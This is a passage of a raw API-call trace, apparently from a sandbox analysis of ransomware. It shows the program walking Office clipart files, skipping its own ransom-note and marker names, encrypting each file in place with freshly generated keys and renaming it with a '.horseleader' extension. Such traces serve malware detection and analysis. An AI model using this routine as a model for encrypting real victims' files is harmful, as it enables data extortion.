lpNumberOfBytesRead=0x32aedf4*=0xb96, lpOverlapped=0x0) returned 1 [0253.861] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff46a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.861] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb96, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb96, lpOverlapped=0x0) returned 1 [0253.861] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 
1 [0253.861] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.861] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.861] CloseHandle (hObject=0x158) returned 1 [0253.861] GetProcessHeap () returned 0x780000 [0253.861] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.861] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.horseleader") returned 74 [0253.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.horseleader")) returned 1 [0253.863] GetProcessHeap () returned 0x780000 [0253.863] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.863] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0x2856, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CUPINST.WMF", cAlternateFileName="")) returned 1 [0253.863] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="Windows") returned 
-1 [0253.863] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 66 [0253.863] StrStrIW (lpFirst="CUPINST.WMF", lpSrch=".horseleader") returned 0x0 [0253.863] lstrcmpW (lpString1="CUPINST.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.863] lstrcmpW (lpString1="CUPINST.WMF", lpString2="_uninstalling_.png") returned 1 [0253.863] lstrlenW (lpString=".testttjffg") returned 11 [0253.863] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF", lpSrch=".testttjffg") returned 0x0 [0253.863] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.863] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.865] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 66 [0253.865] StrStrW (lpFirst="CUPINST.WMF", lpSrch=".txt") returned 0x0 [0253.865] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10326) returned 1 [0253.865] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2856, lpOverlapped=0x0) returned 1 [0253.867] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd7aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0253.867] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2856, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2856, lpOverlapped=0x0) returned 1 [0253.867] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.867] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.867] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.868] CloseHandle (hObject=0x158) returned 1 [0253.868] GetProcessHeap () returned 0x780000 [0253.868] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.868] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.horseleader") returned 78 [0253.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.horseleader")) returned 1 [0253.869] GetProcessHeap () returned 0x780000 [0253.869] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.869] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, 
ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7992, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00117_.WMF", cAlternateFileName="")) returned 1 [0253.869] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="Windows") returned -1 [0253.869] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 67 [0253.869] StrStrIW (lpFirst="DD00117_.WMF", lpSrch=".horseleader") returned 0x0 [0253.869] lstrcmpW (lpString1="DD00117_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.869] lstrcmpW (lpString1="DD00117_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.869] lstrlenW (lpString=".testttjffg") returned 11 [0253.869] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.869] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.869] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.871] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 67 [0253.871] StrStrW (lpFirst="DD00117_.WMF", lpSrch=".txt") returned 0x0 [0253.871] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=31122) returned 1 [0253.871] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.873] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.874] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.874] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2992, lpOverlapped=0x0) returned 1 [0253.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd66e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.874] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2992, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2992, lpOverlapped=0x0) returned 1 [0253.875] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.875] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.875] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.875] CloseHandle 
(hObject=0x158) returned 1 [0253.875] GetProcessHeap () returned 0x780000 [0253.875] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.875] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.horseleader") returned 79 [0253.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.horseleader")) returned 1 [0253.876] GetProcessHeap () returned 0x780000 [0253.876] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.876] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6a43700, ftCreationTime.dwHighDateTime=0x1bd4aee, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6a43700, ftLastWriteTime.dwHighDateTime=0x1bd4aee, nFileSizeHigh=0x0, nFileSizeLow=0x2040, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00121_.WMF", cAlternateFileName="")) returned 1 [0253.876] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="Windows") returned -1 [0253.876] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 67 [0253.876] StrStrIW (lpFirst="DD00121_.WMF", lpSrch=".horseleader") returned 0x0 [0253.876] lstrcmpW (lpString1="DD00121_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.876] lstrcmpW (lpString1="DD00121_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.876] lstrlenW 
(lpString=".testttjffg") returned 11 [0253.876] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.876] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.876] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.878] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 67 [0253.878] StrStrW (lpFirst="DD00121_.WMF", lpSrch=".txt") returned 0x0 [0253.878] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8256) returned 1 [0253.878] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2040, lpOverlapped=0x0) returned 1 [0253.880] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdfc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.880] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2040, lpOverlapped=0x0) returned 1 [0253.880] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.880] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.880] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.881] CloseHandle (hObject=0x158) returned 1 [0253.881] GetProcessHeap () returned 0x780000 [0253.881] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.881] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.horseleader") returned 79 [0253.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.horseleader")) returned 1 [0253.882] GetProcessHeap () returned 0x780000 [0253.882] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.882] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x73bc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00234_.WMF", cAlternateFileName="")) returned 1 [0253.882] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="Windows") returned -1 [0253.882] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 67 [0253.882] StrStrIW (lpFirst="DD00234_.WMF", lpSrch=".horseleader") returned 0x0 [0253.882] lstrcmpW (lpString1="DD00234_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.882] lstrcmpW (lpString1="DD00234_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.882] lstrlenW (lpString=".testttjffg") returned 11 [0253.882] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.882] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.882] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.883] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 67 [0253.883] StrStrW (lpFirst="DD00234_.WMF", lpSrch=".txt") returned 0x0 [0253.883] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=29628) returned 1 [0253.883] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.886] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0253.886] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.886] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x23bc, lpOverlapped=0x0) returned 1 [0253.886] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdc44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.886] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x23bc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x23bc, lpOverlapped=0x0) returned 1 [0253.886] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.886] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.887] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.887] CloseHandle (hObject=0x158) returned 1 [0253.887] GetProcessHeap () returned 0x780000 [0253.887] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.887] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.horseleader") returned 79 [0253.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.horseleader")) returned 1 [0253.888] GetProcessHeap () returned 0x780000 [0253.888] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.888] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf650000, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf650000, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0xa82, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00255_.WMF", cAlternateFileName="")) returned 1 [0253.888] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="Windows") returned -1 [0253.888] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 67 [0253.888] StrStrIW (lpFirst="DD00255_.WMF", lpSrch=".horseleader") returned 0x0 [0253.888] lstrcmpW (lpString1="DD00255_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.888] lstrcmpW (lpString1="DD00255_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.888] lstrlenW (lpString=".testttjffg") returned 11 [0253.888] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.888] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.888] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.890] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 67 [0253.890] StrStrW (lpFirst="DD00255_.WMF", lpSrch=".txt") returned 0x0 [0253.890] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2690) returned 1 [0253.890] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xa82, lpOverlapped=0x0) returned 1 [0253.892] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff57e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.892] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xa82, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xa82, lpOverlapped=0x0) returned 1 [0253.892] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.892] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.892] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.892] CloseHandle 
